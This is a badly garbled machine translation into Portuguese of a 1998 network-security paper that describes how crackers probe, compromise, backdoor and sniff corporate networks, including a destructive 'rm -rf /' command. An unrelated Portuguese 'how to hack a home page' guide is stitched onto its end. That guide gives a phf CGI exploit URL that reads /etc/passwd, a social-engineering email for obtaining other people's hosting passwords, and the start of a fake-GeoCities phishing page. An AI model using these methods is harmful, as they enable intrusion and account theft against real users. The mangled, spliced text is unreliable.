O Ltd De Soluções De Segurança De Rede. BATA pessoal (fist@ns2.co.uk)
------------------------------------------------------------------------------- 1.1 Somente que é vulnerável de qualquer modo?
-------------------------------------------------------------------------------
Ambientes de computador Em Rede são utilizados todo dia por corporações e vários organisations. Redes de computadores permitem usuários para compartilhar quantias vastas de dados muitos eficientemente.
Usualmente redes associadas não são projetadas e implementadas com segurança em mente, meramente funcionalidade e eficiência, embora isto é boa de um ponto de vista de negócios no curto-termo, problemas de segurança usualmente sobem mais tarde, que podem milhões de custo para resolver em ambientes mais grandes.
A Maioria Das redes particulares sensíveis e associadas trabalham em um cliente-servidor princípio, onde empregados usam workstations para conectar para servidores para que compartilham informação. Neste papel nós concentraremos em segurança de servidor, como a maioria do crackers vai sempre primeiro de servidores de alvo, o servidor é muito gostado de um 'centro' onde todo a informação é armazenada. Se um cracker pode ganhar unauthorised acessa para tal um servidor, o descanso dele trabalho é fácil.
Festas Vulneráveis para grande-escala probes de rede usualmente inclue :
Instituições Financeiras e bancos Governo De companhias do Pharmaceutical De provedores de serviço Internet e Contratantes De agências de defesa para várias agências do goverment corporações Multinacionais
Embora muitos destes ataques tomam lugar internamente (por usuários que têm authorised acessa separar das redes sensíveis ou associadas já), nós estaremos concentrando nas técnicas utilizadas quando invadindo tais redes inteiramente do exterior.
Instituições Financeiras e bancos são probed e atacado em tentativas para comprometer fraude. Muitos bancos têm sido targeted desta forma, arriscando fundos monetários vastos. Bancos fazem isto política não para permitir ser as vítimas de tais ataques externos porque eles certamente perderão clientes e confiam se ataques são publically sabido.
Provedores de serviço Internet são um alvo comum por crackers, como servidores do ISP estão facilmente acessíveis da internet, e do ISP tem acessado para fibra grande conexões óticas que podem estar utilizadas por crackers para mover quantias grandes de dados através a internet. O ISP mais grande também tem bancos de dados de cliente, que usualmente contêm informação do usuário confidencial tal como números de cartão de crédito, especifica e endereços.
Companhias do Pharmaceutical são vítimas de principalmente tentativas de espionagem industriais, onde um time de vontade do crackers seja pagada quantias grandes em troca para roubada dados do pharmaceutical, tais companhias de droga freqüentemente gastam milhões em pesquisa e desenvolvimento, e um muito pode ser perdido como um resultado de tal um ataque.
Acima Do durado 6 anos, Governo e agências de defesa nos Estados Unidos têm sido vítima para literalmente milhões de ataques originando da internet. Devido à segurança de informação baixa orça e as políticas de segurança fracas de tais agências, segurança de informação tem tornada-se uma batalha do uphill, como governo e servidores militares estão constantemente sendo probed e atacado por crackers.
Contratantes de Defesa, embora segurança ciente, são alvos ao crackers procurando classificado ou dados militares sensíveis. Tais dados podem então são 'vendidos em' por crackers para grupos estrangeiros. Embora unicamente um punhado destes casos têm sido publically sabido, tais atividades podem ocorrer em uma valor alarmante.
Corporações Multinacionais são exemplos do prime de vítimas de tentativas de espionagem industriais. Corporações Multinacionais têm escritórios baseados completo o mundo, e redes associadas grandes são instaladas em pedido aos empregados para ser capazes de compartilhar informação eficientemente. Pessoal do NSS tem desempenhado penetration testa para corporações multinacionais, e nossas descobertas em a maioria dos casos têm mostrados que muitos podido seja comprometido.
Companhias do pharmaceutical Iguais, corporações multinacionais operando em eletrônica, software ou computador-relacionadas indústrias, gastam milhões em pesquisa e desenvolvimento de novas tecnologias. Isto é muito tentadodo para um competidor de tal uma corporação, para empregar um time de ' crackers de sistema' para roubar dados de uma corporação de alvo. Tais dados podem então estão utilizados para rapidamente e facilmente melhoram o conhecimento de competidores de tecnologias chaves, e resultam em perdas financeiras da corporação de alvo.
Outro forma de ataque adotado por competidores de corporações, está para 'toma nota de' uma rede associada para uma quantia certa de tempo, este resultados em perda de salário à corporação de alvo. Em a maioria dos casos isto está extremamente difícil para localizar a fonte de tal um ataque. Contando Com o segmentation de rede interno em lugar, esta espécie de ataque pode estar enormemente efetivo e resulta em perdas financeiras maciças.
Tal ' jogo sujo' é lugar comum em sociedade em rede de hoje, e deveria seria tomar muita seriamente.
------------------------------------------------------------------------------- 1.2 Perfil de um típico ' cracker de sistema' ------------------------------------------------------------------------------
Estudos têm mostrados aqueles típicos uns ' cracker de sistema' está usualmente masculino, envelhecido entre 16 e 25. Tal crackers usualmente torna-se interessado em invadir máquinas e redes para que melhoram suas habilidades partidas, ou para usar recursos de rede para seus próprios propósitos. A Maioria Do crackers estão completamente persistente em seus ataques, isto é devido à quantia de tempo livre um cracker médio tem.
Uma alta porcentagem de crackers são oportunistas, e correm scanners para checar números maciços de anfitriões para vulnerabilidades de sistema remotas. Sobre identificar os anfitriões ou redes que são vulneráveis para ataques remotos, o cracker usualmente ganhará raiz acessa ao anfitrião, então instala um backdoor e remenda o anfitrião de vulnerabilidades remotas comuns, isto previne outro crackers de existência capaz para usar as mesmas técnicas populares para ganhar acesso ao anfitrião.
Oportunistas operam em primeiramente dois domínios, a primeira existência a internet, as segundas redes de telefone de existência.
Para examinar os anfitriões internet para vulnerabilidades remotas comuns, o cracker usualmente lançará uma operação examinada de um anfitrião que ele tem acessado para com uma conexão rápida à internet, usualmente em uma fibra-ótica conexão.
Para examinar para máquinas operando em redes de telefone, sendo servidores terminais, boletim hospeda sistemas, ou voz envia sistemas. O cracker usará um programa do wardialling, esta vontade automaticamente examina quantias grandes de números de telefone para 'carregadores', assim identificando tais sistemas.
Uma muita pequena porcentagem de crackers realmente define alvos e tentam atacar eles, tal crackers estão longe mais hábis, e adotam 'incisivos-margem' técnicas para comprometer redes. Isto é conhecido para esses tipos de crackers para atacar redes associadas que são firewalled da internet por explorar não-publicadas vulnerabilidades e 'recursos' no firewalls.
As redes e hospeda targeted por esses crackers usualmente tem dados sensíveis contidos dentro eles, tal como pesquisam e notas de desenvolvimento, ou outros dados que provarão útis ao cracker.
Tal crackers são também conhecido de tem acessado explorar e ferramentas utilizadas por consultores de segurança e companhias de segurança grandes, e então uso eles para examinar definido alvos para todo sabido vulnerabilidades remotas. Crackers que estão atacando anfitriões específicos estão também usualmente muito paciente, e tem sido conhecido gastar muitos meses juntando dados antes tentar ganhar acesso para um anfitrião ou rede.
------------------------------------------------------------------------------- 2.1 metodologias de Rede adotadas por muitas companhias ------------------------------------------------------------------------------
Uma vontade de corporação típica tem uma presença internet aos seguintes propósitos :
O hospedado de E-mail Do webservers associado e outras comunicações globais via. a internet Para dar os empregados acesso internet
Do NSS DE corporações tem desempenhado penetration de rede testa da internet para, um ambiente em rede é adotado onde a rede associada e a internet são seperated por firewalls e proxies de aplicação.
Em tais ambientes, o webservers associado e mailservers são usualmente guardados nos 'exterior' da rede associada, e então informação é passada via. confiado canais sobre a rede associada.
No caso de confiança apresenta entre o mailservers externo e hospeda na rede associada, uma bema-pensamento filtro política tem colocar dentro efeito, como usualmente o mailservers externo deveria unicamente ser capaz de conectar para porta 25 de um solteiro 'seguro' mailserver na rede associada, como esta vontade maciçamente minimise a probabilidade de acesso do unauthorised, mesmo que o mailserver externo é comprometido.
Um Dos NSS DE redes associado tem desempenhado penetration testa em também teve um punhado de 'dual-homed' anfitriões, esses anfitriões tiveram interfaces de rede ativas em ambas a internet e a rede associada. De um ponto de vista de segurança, tais anfitriões que operam em redes múltiplas podem posar uma ameaça maciça para segurança de rede, como sobre comprometer um anfitrião, isto então substitui um simples 'ponte' entre redes.
------------------------------------------------------------------------------- 2.2 Compreendendo vulnerabilidades em tais sistemas em rede ------------------------------------------------------------------------------
Na internet, uma corporação pode tem 5 webservers externo, 2 mailservers externo, e um firewall ou filtro sistema implementado.
Webservers estão usualmente não atacado por crackers desejando ganhar acesso à rede associada, a menos que o firewall é misconfigured em algum caminho que permitirá o cracker acessa à rede associada sobre comprometer o webserver. Embora isto está sempre bom practise para seguro seu webservers e corre TCP wrappers para festas para conectar ao telnet e portas de ftp.
Mailservers estão comumente targeted por crackers desejando ganhar acesso à rede associada, como um mailserver deve tem acessar ao mailservers na rede associada para que distribue e troca correspondência entre a internet e a rede associada. Outra Vez, contando com o filtro em lugar, este tactic pode ou efetivo em parte do cracker.
Filtro routers estão também comumente targeted por crackers com agressive-snmp scanners e fio de comunidade bruto-força programas, se tal um ataque é efetivo, o router pode facilmente ser virado uma ponte, assim permitindo unauthorised acessa à rede associada.
Nesta espécie de situação o cracker avaliará exatamente que anfitriões externos ele tem acessado para, e então tentativa para identificar quaisquer espécies de confiança entre a rede associada e os anfitriões externos. Portanto se você instala TCP wrappers em todo seus anfitriões externos, que definem que unicamente festas confiadas podem conectar às portas do critical de seus anfitriões, que estão usualmente :
ftp (21), ssh (22), telnet (23), smtp (25), especificado (53), pop3 (110), imap (143), rsh (514), rlogin (513), lpd (515).
SMTP, especificado e portmapper deveria seria filtro portanto contar com papel do anfitrião está na rede.
Tal filtro tem sido proven para maciçamente reduzimos o risco de um ataque na rede associada.
Nos casos de redes com não limpam 'associadas à internet' política de segurança de rede, múltiplos-homed anfitriões e misconfigured routers existirá.
Uma falta de segmentation de rede interno vai também usualmente existe, isto faz isto um muito mais fácil para um cracker baseado na internet para ganhar o unauthorised acessa à rede associada.
mapping de rede Associado pode facilmente ocorrer se servidores do DNS externos são misconfigured, como NSS tem desempenhado penetration testa onde nós temos sido capazes de para mapa a rede associada via. tal um servidor do misconfigured DNS, por causa deste, isto é muito importante que DNS não existe entre os anfitriões na rede associada e anfitriões externos, isto está longe mais seguro para simplesmente usa IP endereça conectar para máquinas externas da rede associada e vice-versa.
Anfitriões Inseguros com interfaces de rede ativas em redes múltiplas podem ser abusadas ganhar acesso à rede associada muita facilmente.
O anfitrião inseguro faz não até mesmo tem comprometer. Isto é muito fácil para abusar um daemon de dedo em tal um anfitrião que permite transmitindo.. como usuários, hospeda e outra informação de rede pode ser colecionada identificar facilmente exploitable hospeda na rede associada, o sistema operacional de um anfitrião pode até mesmo ser determinado em muitos casos por emitir um dedo solicita para root@host, bin@host e daemon@host.
Algum crackers estão agora começando adotar técnicas com respeito às 'wardialling' de localizações associadas, tal como construindo e centros de operação de rede.
Se um cracker foi encontrar e então compromisso um servidor terminal associado, ele poderia usualmente ter um grau de acesso à rede associada, assim totalmente desviando qualquer firewalls ou filtro aquele seperate a rede associada da internet. Isto está portanto muito importante para identificar e assegura a segurança de seus servidores terminais, registrando de conexões para tais servidores está também fortemente aconselhado.
Quando tentando compreender vulnerabilidades em sistemas em rede, um ponto chave para recordar, está confiando entre os anfitriões em sua rede. Um Ou Outro através do uso de TCP wrappers, hosts.equiv arquivos, .rhosts ou . arquivos do shosts, muitas redes mais grandes são comumente atacadas por explorar a confiança entre os anfitriões.
Por Exemplo, se um attacker usa um CGI explora ver seu hosts.allow arquivo, ele pode achado que você todas conexões para seu ftp e portas do telnet de *.trusted.com. Certamente, o attacker pode então ganho acessa para qualquer anfitrião em trusted.com, e ganha acesso para seus anfitriões facilmente.
Para essas razões, isto está sempre uma boa idéia para assegurar que confiada anfitriões estão igualmente seguros de ataque remoto.
Um outro ataque que deveria seria mencionar, é a instalação de troianos e backdoors nos anfitriões associados (tal como Windows 95/98 máquinas), se os empregados têm acesso internet através de usar um proxy de aplicação e um firewall, então eles vão às vezes visita 'warez' sites para descarregar software do pirated.
Tal 'warez' sites usualmente têm software do screesaver, e outros utilitários em oferecem, que em alguns casos contêm programas do cavalo de troiano, tal como o Culto da Vaca Morta ' troiano de Orifícios Posteriores. Sobre a instalação do screensaver, o troiano infesta si mesmo dentro registro da máquina e está correndo todo tempo as botas de máquina.
No caso do troiano do BO, plugins pode ser aplicado ao troiano para fazer a máquina desempenha operações certas automaticamente, tal como conectam para servidores do IRC e unem canais, e o gostado de. Isto pode provar muito perigoso, como uma máquina do trojaned em sua rede associada podia facilmente ser controlada por alguéma na internet.
O troiano do BO está infinitamente mais efetivo se o cracker já tem acessado à rede associada, um ou outro porque ele é um empregado ou tem unauthorised acessa aos anfitriões associados. O troiano do BO podia ser instalado em todo Windows único 95/98 máquina em uma matéria de semanas se o cracker usa a estratégia correta, depois que ele terá controle remoto total acima das máquinas em pergunta, incluindo existência capaz para manipular arquivos, máquinas do reboot e formato par dirige, inteiramente remotamente.
------------------------------------------------------------------------------- 3.1 Técnicas utilizadas para 'manto' a localização do attackers ------------------------------------------------------------------------------
crackers Típico usualmente usará as seguintes técnicas para esconder seu endereço do IP verdadeiro :
- Bouncing através de previamente anfitriões comprometidos via. telnet ou rsh.
- Bouncing através do windows hospeda via. Wingates.
- Bouncing através dos anfitriões usando misconfigured proxies.
Se tal um cracker tem um modelo de sempre examinando seus anfitriões de previamente máquinas comprometidas, wingates ou proxies, então isto é aconselhável para contactar o administrador da máquina por telefone, e notifica ele dos problemas em mão. Nunca e-mail um administrador em tal um caso, porque o cracker pode simplesmente interceptar o e-mail de antemão.
O mais talented crackers que são hábil em invadir os anfitriões via.
trocas de telefone, podem uso as seguintes técnicas :
- Bouncing através de '800-number' telefone particular troca antes conectar para um ISP usando um 'cracked, 'phished' ou ' conta do carded.
- Conectando para um anfitrião por telefone, que está em volta conectada à internet.
Crackers adotando as técnicas de bouncing através de redes de telefone antes conectar à internet estão extremamente duras para seguir a pista abaixo, porque eles podiam estar literalmente em qualquer parte no mundo. Se um cracker foi usar um '800-number' dialup, ele podia discar dentro máquinas globalmente sem ter preocupar sobre o custo.
------------------------------------------------------------------------------- 3.2 probing de Rede e reunião de informação ------------------------------------------------------------------------------
Antes valor fora para atacar uma rede associada da internet, um cracker típico desempenhará algum probes preliminar de suas redes anfitriões externos apresentam na internet. Um cracker tentará ganhar externo e hostnames interno por usar as seguintes técnicas :
- Usando nslookup para desempenhar 'ls
- Vê o HTML em seu webservers para identificar quaisquer outros anfitriões.
- Vê os documentos em seus servidores de FTP.
- Conecta para seu mailservers e desempenha 'expn
- Manuseia usuários em seus anfitriões externos.
Crackers usualmente tenta juntar informação sobre o layout de sua rede si mesmo primeiro como oposto identificar vulnerabilidades específicas.
Por olhar resultados das perguntas listadas acima, isto está usualmente fácil para um cracker para construir uma lista de anfitriões e começam compreender os relacionamentos que existem entre eles.
Quando desempenhando esses probes preliminar, um cracker típico fará muitos pequenos erros e às vezes usam seu possuem IP para conectar para portas de suas máquinas para checar versões de sistema operacional e outros pequenos detalhes.
Se seus anfitriões são comprometidos, isto é uma boa idéia para checar seu FTP e HTTPD registra à presença de quaisquer solicitações estranhas.
------------------------------------------------------------------------------- 3.3 Identificando confiado componentes de rede ------------------------------------------------------------------------------
Crackers espera confiado componentes de rede para atacar, um componente de rede confiado está usualmente uma máquina de administradores, ou um servidor que é considerado como seguro.
Um cracker empreenderá por checar o NFS exporta de qualquer de suas máquinas nfsd que corre ou mountd, o caso sendo aqueles diretórios do critical em alguns de seus anfitriões (tal como /usr/bin, /etc e /casa por exemplo) pode ser mountable por tal um anfitrião confiado.
O daemon de dedo é freqüentemente abusado identificar confiado anfitriões e usuários, sendo usuários que freqüentemente registram dentro a máquina dos anfitriões específicos.
O cracker vai então checa suas máquinas para outros formulários de confiança, se ele pode explorar uma máquina usando uma vulnerabilidade do CGI, ele pode ganho acessa para uns anfitriões /etc/hosts.allow arquivo, por exemplo.
Depois analysing os dados dos acima checa, o cracker começará identificar confiança entre os anfitriões. O próximo passo ao cracker está identificar quaisquer anfitriões confiados que são vulneráveis para um compromisso remoto.
------------------------------------------------------------------------------- 3.4 Identificando componentes de rede vulneráveis ------------------------------------------------------------------------------
Se um cracker pode construir listas de seu externo e anfitriões internos, ele usará Linux programa tal como ADMhack, mscan, nmap e muitos scanners menores para examinar para vulnerabilidades remotas específicas.
Usuaully tais examinados de sua vontade dos anfitriões externa seja lançada de máquinas em conexões fibra-óticas rápidas, ADMhack requer correr como raiz em uma máquina do Linux, assim um cracker provavelmente usará uma máquina do Linux que ele tem ganho unauthorised acessa para e propriamente instalado um 'rootkit' em. Tal um 'rootkit' é utilizado para binários de sistema do backdoor critical para permitir o unauthorised e undetectable acessa ao anfitrião.
Os administradores de sistemas dos anfitriões que são utilizados para examinar os anfitriões associados externos usualmente têm nenhuma idéia que examina estão sendo lançados de suas máquinas, como binários tal como 'ps' e ' donetstat são trojaned para esconder examinando processos.
Outros programas tal como mscan e nmap não requer correr como raiz, e assim pode ser lançada do Linux (ou outras plataformas no caso de nmap) hospeda para efetivamente identifica vulnerabilidades remotas, embora esses examina são mais lentas, e podem não usualmente estão bemas muitas ocultas (como o attacker não necessita raiz acessa ao anfitrião como com o ADMhack).
Ambos ADMhack e mscan desempenha os seguintes tipos de checa nos anfitriões remotos :
- Um TCP portscan de um anfitrião.
- Um dump dos serviços do RPC correm via. portmapper.
- Uma listagem de exportações apresentam via. nfsd.
- Uma listagem de ações apresentam via. samba ou netbios.
- dedo Múltiplo solicita identificar contas de default.
- vulnerabilidade do CGI examinando.
- Identificação de versões vulneráveis de daemons de servidor, incluindo Sendmail, IMAP, POP3, condição do RPC e RPC mountd.
Programa tal como SATANÁS estão raramente utilizado por crackers hoje em dia, como eles são lentos.. e examina para vulnerabilidades obsoletas.
Depois ADMhack que corre ou mscan nos anfitriões externos, a vontade do cracker tem uma boa idéia de anfitriões seguros ou vulneráveis.
Se routers estão apresentando que são SNMP capaz, o mais crackers avançado adotará agressive-snmp examinando técnicas para tentar e ' força de bruto' os fios de comunidade particulares e públicos de tais dispositivos.
------------------------------------------------------------------------------- 3.5 Aproveitando componentes de rede vulneráveis ------------------------------------------------------------------------------
Assim o cracker tem identificado quaisquer anfitriões externos confiados, e também identificados quaisquer vulnerabilidades nos anfitriões externos. Se quaisquer componentes de rede vulneráveis foram identificados, então ele tentará comprometer seus anfitriões.
Um cracker paciente não comprometerá seus anfitriões durante horas normais, ele usualmente lançará um ataque entre 9pm na noite e 6am a próxima manhã, esta vontade reduzimos o likelyhood de qualquer um sabendo sobre o ataque, e dá o cracker tempo amplo para instalar o backdoors e sniffers em seus anfitriões sem ter preocupar sobre a presença de Administradores De Sistemas.
A Maioria Do crackers tem um grande acordo de tempo livre acima de fins-de-semana, e ataques são usualmente lançados então.
O cracker comprometerá um externo confiado anfitrião que pode estar utilizado como um ponto de que para lançar um ataque na rede associada. Contando Com o filtro entre a rede associada e os anfitriões associados externos, esta técnica pode ou.
Se o cracker compromete um mailserver externo, que na verdade tem acesso total para um segmento da rede associada interna, então ele pode começar trabalho em embutir ele mesmo fundamente dentro sua rede.
Para comprometer a maioria dos componentes em rede, crackers usará programas para remotamente exploram versões vulneráveis de daemons de servidor continua anfitriões externos, tais exemplos incluem versões vulneráveis de Sendmail, IMAP, POP3 e serviços do RPC tal como statd, mountd e pcnfsd.
A Maioria Das façanhas remotas utilizadas por crackers são lançadas de previamente anfitriões comprometidos, como em alguns casos eles necessitam compilar na mesma plataforma como o anfitrião eles estão estar utilizados para explorar.
Sobre executar tal um programa remotamente para explorar um daemon de servidor vulnerável continua seu anfitrião externo, o cracker usualmente ganhará raiz acessa para seu anfitrião, que na verdade pode ser abusado ganhar acesso para outros anfitriões e a rede associada.
------------------------------------------------------------------------------- 3.6 Sobre ganho acessa para componentes de rede vulneráveis ------------------------------------------------------------------------------
Depois explorando um daemon de servidor, o cracker começará um 'limpo-para cima' operação de falsificação seus anfitriões registra e ' binários de serviço do backdooring assim ele pode acessar o undetected do anfitrião mais tarde.
Primeiro ele começará implementar o backdoors, assim ele pode mais tarde acessar o anfitrião. A Maioria Do backdoors que uso do crackers são precompiled, e técnicas são adotadas mudar a data e as permissões do binário que tem sido backdoored, em alguns casos, até mesmo o filesize do novo binário é o mesmo como o binário original. Attackers ciente de FTP transfere registros podem uso o 'rcp' programa copiar o backdoored programa hospedar.
Isto é improvável que tal um cracker invadindo uma rede associada começará remendar seus anfitriões de vulnerabilidades, ele vai usualmente unicamente instala backdoors e binários de sistema do critical de troiano tal como 'ps' e 'netstat para esconder quaisquer conexões ele pode faz para e do anfitrião.
Os seguintes binários do critical estão usualmente backdoored no Solaris 2.x máquinas:
/usr/bin/login /usr/sbin/ping /usr/sbin/in.telnetd /usr/sbin/in.rshd /usr/sbin/in.rlogind
Algum crackers tem também sido conhecido colocar um .rhosts arquiva no /usr/bin diretório para permitir depósito remoto acessa ao anfitrião via. rsh e csh em modo interativo.
A próxima coisa que a maioria do crackers está checar o anfitrião para qualquer presença de registrar sistemas que podem têm registrados suas conexões ao anfitrião, ele vai então continua editar tais conexões fora de quaisquer registros encontrados no anfitrião. Isto é aconselhável para registrar para um lineprinter se a máquina é muita provavelmente para ser um alvo do prime de um ataque, como isto faz isto extremamente difícil ao cracker para editar ele mesmo dos registros.
Sobre assegurar que sua presença não tem sido registrada em qualquer caminho, o cracker continuará invadir a rede associada. A Maioria Do crackers vai não mais ambas vulnerabilidades exploradas em outros anfitriões externos se eles têm acessado à rede interna.
------------------------------------------------------------------------------- 4.1 Descarregando informação sensível ------------------------------------------------------------------------------
Se meta do cracker está descarregar informação sensível de servidores de FTP ou webservers na rede associada interna, ele pode fazer assim do anfitrião externo que está agindo como um 'ponte' entre a internet e rede associada.
Entretanto, se meta do cracker está descarregar informação sensível segurada dentro internamente anfitriões em rede, ele continuará tentar ganhar acesso para eles por abusar a confiança com o anfitrião externo ele já tem acessado para.
------------------------------------------------------------------------------- 4.2 Partindo outro confiado anfitriões e redes ------------------------------------------------------------------------------
A Maioria Do crackers simplesmente repetirá os passos aceitados seções 3.2, 3.3, 3.4 e 3.5 ao probe e ganha acesso para hospedar na rede associada interna, contando com que o cracker está tentando alcançar, troianos e backdoors pode ou em seus anfitriões internos.
Se o cracker deseja alcançar rede total acessa aos anfitriões na rede interna, ele instalará troianos e backdoors e remove registros como em seção 3.6. Crackers também instalará sniffers em seus anfitriões, esses são explicados em seção 4.3.
Se o cracker meramente deseja descarregar dados de servidores chaves, ele tomará aproximações diferentes para ganhar acesso para seus anfitriões, tal como identificando e atacando anfitriões chaves que são confiados pelo alvo servidores chaves.
------------------------------------------------------------------------------- 4.3 Instalando sniffers ------------------------------------------------------------------------------
Um extremamente caminho efetivo ao crackers para rapidamente obtem quantias grandes de usernames e senhas para internamente anfitriões em rede está usar 'ethernet sniffer' programas. Porque tal 'sniffer' programa necessidade para operar no mesmo ethernet como os anfitriões o cracker deseja ganhar acesso para, isto poderia estar ineficaz para correr um sniffer no anfitrião externo ele está usando como uma ponte.
Para '(funga' dados fluindo através a rede interna, o cracker deve desempenhar uma raiz remota compromete de um anfitrião interno que está no mesmo ethernet como um número de outros anfitriões internos. As técnicas mencionadas em seções 3.2, 3.3, 3.4, 3.5 e 3.6 são adotadas aqui, como o cracker deve comprometer e backdoor o anfitrião bem sucedidamente para assegurar que o programa do sniffer pode ser instalado e utilizado efetivamente.
Sobre comprometer, instalando um backdoor e instalando trojaned 'ps' e ' programas do netstat, o cracker deve então instala o 'ethernet sniffer' programa no anfitrião. Tais programas do sniffer são usualmente instalados nos /usr/bin ou / diretórios do dev sob o Solaris 2.x, e então modificado parecer como se eles foram instalado com todo os outros binários de sistema.
Maior 'ethernet sniffers' visita a fundo e saída para um registro na máquina local, isto é importante para recordar que o cracker vai usualmente backdoor o ' binário do ps, assim o processo notável.
Tal 'ethernet sniffers' trabalha por retorno uma interface de rede dentro ' modos do promiscuous, a interface então escuta e registra ao sniffer logfile, qualquer usernames útil, senhas ou outros dados que podem estar utilizados pelo cracker para ganhar acesso para outros anfitriões em rede.
Porque 'ethernet sniffers' são instalado no ethernets, literalmente quaisquer dados viajando através aquela rede pode ser (fungada, isto não tem viajar para ou do anfitrião em que o sniffer é instalado.
O cracker usualmente voltará uma semana mais tarde e descarrega o logfile criado pelo 'sniffer' programa. No caso de uma rede associada rompe tal como esta, isto está provavelmente que a vontade do sniffer seja montada muita bema, e dificilmente detectable a menos que uma boa política de segurança é implementada.
Um muito bom utilitário utilizado por muitos segurança-cientes Administradores é Tripwire, que é disponível de COSTA (vê seção 5.2). Tripwire faz um MD5 'impressão digital' de seu filesystem, e detectará quaisquer modificações para seus arquivos feitos por usuários do malicious ou crackers.
Para detectar interfaces de rede do promiscuous (um sinal comum de uma instalação do sniffer), a 'cpm' ferramenta disponível do CERT é muito útil, vê http://www.cert.org/ftp/tools/cpm/ para mais informação.
------------------------------------------------------------------------------- 4.4 Tomando Nota De redes ------------------------------------------------------------------------------
Se um cracker pode comprometer servidores chaves aplicações de servidor que corre tal como bancos de dados, sistemas de operações de rede ou qualquer outro ' critical de missão' funções, isto é fácil para ele para tomar nota de sua rede para um período de tempo.
Um cru, mas não técnica rara adotada por crackers tentando desabilitar funções de rede, poderiam ser apagar todo os arquivos dos servidores chaves por emitir uns 'rm -rf / &' comanda no servidor. Contando Com o sistema de cópia de segurança implementado, o sistema podia ser para algo de horas, para meses.
Se um cracker foi ganhar acesso para sua rede interna, ele podia abusar vulnerabilidades apresentam em muitos routers tal como no Cisco, Baía e Ascende marcas. Em alguns casos o cracker podia reiniciar, ou fecha routers inteiramente até um administrador foi ao reboot eles.
Isto pode causar problemas grandes com respeito a funcionalidade de rede, como se o cracker foi montar uma lista de routers vulnerável que desempenhado papeis de rede chaves (se eles estiveram utilizados no backbone associado por exemplo), então ele podia facilmente desabilitar a capacidade de rede de corporações para algum tempo.
Para essas razões, isto é muito importante que ' critical de missão' routers e servidores são sempre remendados e seguros.
------------------------------------------------------------------------------- 5.1 Sugerido leitura ------------------------------------------------------------------------------
Há muitos bons papeis disponíveis para ajudar você mantem segurança de seu externo e anfitriões internos e routers, nós recomendamos você visita o seguinte websites e olha nos seguintes livros se você deseja aprender mais sobre securing redes grandes e anfitriões :
http://www.antionline.com/archives/documents/advanced/ http://www.rootshell.com/beta/documentation.html http://seclab.cs.ucdavis.edu/papers.html
http://rhino9.ml.org/textware/
' Unix Prático & Segurança Internet' ------------------------------------
Uma boa introdução dentro Unix e segurança Internet se você realmente não tem lido muito dentro o assunto antes.
Simson Garfinkel e Spafford O'Reilly De Gene & Associa, Inc.
ISBN 1-56592-148-8
NÓS $39.95 POSSO $56.95 (UK cerca 30 libras)
------------------------------------------------------------------------------- 5.2 Sugerido ferramentas e programas ------------------------------------------------------------------------------
Há muitas boa segurança grátis programa disponível para plataformas comuns tal como Solaris, IRIX, Linux, AIX, HP-UX e Windows Nt, nós recomendamos você olha no seguinte websites para informação em tais ferramentas de segurança grátis :
ftp://coast.cs.purdue.edu/pub/tools/unix/ http://www.alw.nih.gov/Security/prog-full.html http://rhino9.ml.org/software/
Ltd De Soluções De Segurança De Rede., está também correntemente desenvolvendo um plethora de ferramentas de segurança para Unix e Windows baseado plataformas, essas vontade está disponível acima dos próximos meses poucos, sentem liberam visitar nosso site no http://www.ns2.co.uk , também tem cuidado grátis 'lite' versões de nosso software!
-------------------------------------------------------------------------------
Copyright (c) Ltd De Soluções De Segurança De Rede. 1998 Todos Os Direitos Reservados, todas marcas registradas reconhecidas
http://www.ns2.co.uk
Este documento pode ser distribuido no domínio público enquanto o acima notas de copyright permanecem intactas.
-------------------------------------------------------------------------------
COMO HACKEAR UMA HOME PAGE
Nesse texto vou mostrar alguns métodos de como hackear uma home page. Queria avisar que hackear uma home page é considerado crime e que isso dá cadeia. Toda vez que você entra em um sistema seu IP fica gravado e vão poder te encontrar . Portanto antes de cometer um ato como esse eu sugiro que vocês tomem umas medidas de segurança como spoofing e etc... um ataque via browser pode ser usado o proprio ANONIMIZER. Muito cuidado!!!
ATAQUE VIA -BROWSER
O ataque via browser é com certeza o modo mais simples de se obter o arquivo passwd. É tão simples que você não precisa saber nada!
A única coisa que você tem que fazer é abrir seu browser e colocar uma URL.
Porém esse método tem 80% de chance de não funcionar! Mas não custa nada tentar
A maioria dos servidores já acharam o bug e concertaram.
Só colocar essa URL no location do seu browser :
http://Endereço_da_pagina/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Apenas isso e pronto!
HACKEANDO SERVIDORES DE HOME PAGES GRATIS (1)
Alguns servidores de home page tipo a geocities, tripod e a angelfire, dão espaço para pessoas colocarem suas home pages no ar. Há um modo bem simples de se obter a senha de home pages que estão nesses servidores.
Tudo que voce tem que fazer é mandar um e-mail pedindo
pra eles te mandarem a senha da home page.
Mas não mande um e-mail estúpido tipo : "por favor me mandem a senha".
Façam algo mais convincente e de preferencia em inglês. Pegue todas as informações da HP possíveis.
E faça do tipo :
"Mês passado eu me cadastrei no serviço de vocês e recebi uma senha e um user name e meu endereço . Eu coloquei algumas coisas no meu espaço e saí de férias. Quando voltei das ferias eu tinha me esquecido da senha!! Só me lembrava do user name, que é : "user name da HP". Fiquei um bom tempo de ferias e não pude pagar o provedor, por isso estou com um e-mail diferente do que consta no cadastro de vocês. O meu antigo e-mail era esse "mail do webmaster da HP" Por favor preciso que vocês me mandem um e-mail para "seu e-mail". Porque eu não tenho o backup dos arquivos que coloquei lá e não gostaria de perde-los. Obrigado pela atenção. Espero que voces mandem a senha o mais rápido que puderem."
Companhias como a geocities são muito ocupadas pra ficar verificando se é verdade eu não!
Provavelmente eles irao acreditar e em 2 semanas(mais ou menos) você receberá a senha no seu e-mail... crie uma conta de e-mail anonimo com nome@hotmail.com
HACKEANDO SERVIDORES DE HOME PAGES GRATIS (2)
Outro modo de hackear esse tipo de home pages é enganar o próprio webmaster da HP! Esse modo funciona normalmente com webmasters idiotas que não sabem muito coisa e nem percebem que eles mesmos estão dando a senha para o hackeador. É outro método bem simples mas um pouco mais demorado. O que você tem que fazer é criar uma pagina onde você finge que é a geocities que esta dando mais megas para HP's! Ou seja, você terá que criar uma página imitando a geocities! Faça uma pagina exatamente no estilo da da geo. E coloque tudo com as mesmas gifs, mesmos banners e coloque um formulário pra ser preenchido e diga que quem preencher aquilo vai ganhas mais 10 megas livre de espaço pra HP!!!
